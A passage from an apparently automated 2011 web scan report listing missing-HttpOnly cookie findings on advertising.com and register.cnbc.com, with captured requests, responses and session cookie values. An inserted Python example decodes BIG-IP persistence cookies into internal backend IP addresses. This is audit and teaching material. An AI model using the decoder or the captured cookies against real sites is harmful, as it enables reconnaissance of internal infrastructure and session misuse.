Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4
...[SNIP]...

13.143. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:41:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:41:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6
...[SNIP]...

13.144. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:21:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:21:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

13.145. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:15:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 559
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7
...[SNIP]...

13.146. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:31:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:31:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8
...[SNIP]...

13.147. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:57:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:57:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9
...[SNIP]...

13.148. http://register.cnbc.com/forgotPassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://register.cnbc.com
Path:   /forgotPassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:01:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://register.cnbc.com/forgotPassword.do
Content-Length: 227
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=834785856.20480.0000; expires=Tue, 06-Sep-2011 18:01:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://register.cnbc.com/forgotPassword.do">he
...[SNIP]...

13.149. http://register.cnbc.com/forgotpassword1.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://register.cnbc.com
Path:   /forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotpassword1.jsp HTTP/1.1
Host: register.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:01:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://register.cnbc.com/forgotpassword1.jsp
Content-Length: 229
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://register.cnbc.com/forgotpassword1.jsp">
...[SNIP]...

13.150. https://register.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT
ETag: "3b-4710dd15eb100"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

<script>
window.location="http://www.cnbc.com";
</script>
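The two findings above (13.149 over plain HTTP, 13.150 over HTTPS) and the identical ones that follow all concern the same persistence cookie. The following is an added example, not code from the XSS.CX report or from the site: it parses the two Set-Cookie headers shown above, reproduces the missing-flag checks, and then does what the issue detail asks, reviewing the cookie's contents. The name prefix (pers_cookie_insert_) and the value shape (<decimal>.<decimal>.0000) match the F5 BIG-IP cookie-persistence encoding, so the decoder applies that format on the assumption that this is such a cookie; the report itself does not say what sits behind the load balancer, and the decoded addresses are simply what the format yields.

```python
"""Audit Set-Cookie headers the way the HttpOnly findings above do, and
decode the BIG-IP-style persistence value the cookie carries (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Set-Cookie values copied from findings 13.149 (plain HTTP, port-80 pool)
# and 13.150 (HTTPS, port-443 pool); the scheme is the one the request used.
SAMPLE_HEADERS = [
    ("http",
     "pers_cookie_insert_cnbc.com_Prod_registration_servers_80="
     "1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/"),
    ("https",
     "pers_cookie_insert_cnbc.com_Prod_registration_servers_443="
     "834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/"),
]


@dataclass
class Cookie:
    name: str
    value: str
    attrs: Dict[str, str] = field(default_factory=dict)  # lower-cased keys

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs


def parse_set_cookie(header: str) -> Cookie:
    """Split one Set-Cookie header into name, value and attributes.
    Flag attributes (HttpOnly, Secure) are stored with an empty value."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return Cookie(name.strip(), value.strip(), attrs)


def audit(scheme: str, header: str) -> List[str]:
    """Flag problems in the order a scanner reports them: HttpOnly always,
    Secure only when the cookie was issued over HTTPS (a Secure flag on a
    plain-HTTP response is ignored by the browser anyway)."""
    cookie = parse_set_cookie(header)
    problems = []
    if not cookie.httponly:
        problems.append("missing HttpOnly")
    if scheme == "https" and not cookie.secure:
        problems.append("missing Secure")
    return problems


# Assumed format (classic F5 BIG-IP cookie persistence): "<ip>.<port>.0000",
# where <ip> is the pool member's IPv4 address as a little-endian 32-bit
# decimal and <port> is the pool member's port with its two bytes swapped.
BIGIP_RE = re.compile(r"^(\d{1,10})\.(\d{1,5})\.0000$")


def decode_bigip_persistence(value: str) -> Optional[Tuple[str, int]]:
    """Return (ip, port) for a BIG-IP persistence value, or None when the
    value is not in that format."""
    m = BIGIP_RE.match(value)
    if not m:
        return None
    ip_int, port_int = int(m.group(1)), int(m.group(2))
    if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
        return None
    octets = [(ip_int >> shift) & 0xFF for shift in (0, 8, 16, 24)]
    port = ((port_int & 0xFF) << 8) | (port_int >> 8)
    return ".".join(str(o) for o in octets), port


def audit_report(samples=SAMPLE_HEADERS) -> List[dict]:
    """One record per Set-Cookie: the flag findings plus, when the value
    decodes as BIG-IP persistence, the backend address it points at."""
    report = []
    for scheme, header in samples:
        cookie = parse_set_cookie(header)
        report.append({
            "name": cookie.name,
            "problems": audit(scheme, header),
            "backend": decode_bigip_persistence(cookie.value),
        })
    return report


if __name__ == "__main__":
    for rec in audit_report():
        print(rec)
```

Run as-is it prints one record per sample. The decode shows why the scanner's "does not appear to contain a session token" caveat is the right call on session-hijack risk but not the end of the review: a persistence cookie in this format hands every client the pool member's address and port (the _80/_443 suffix in the name is the virtual server's port; the decoded port is the member's), and the fix for that is the load balancer's cookie encryption, not HttpOnly. The cookie that would matter for HttpOnly, the JSESSIONID seen in the requests, is not set by any response captured in this section, so the example makes no claim about it.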

13.151. https://register.cnbc.com/RandomImage.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /RandomImage.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RandomImage.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/
Content-Length: 2261

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

13.152. https://register.cnbc.com/cas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /cas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:44 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 201
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /cas was not found on this server.</p>
</body></html>
...[SNIP]...

13.153. https://register.cnbc.com/checkemail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkemail.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkemail.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 231
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Email Address is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp
...[SNIP]...

13.154. https://register.cnbc.com/checkpassword.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /checkpassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkpassword.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
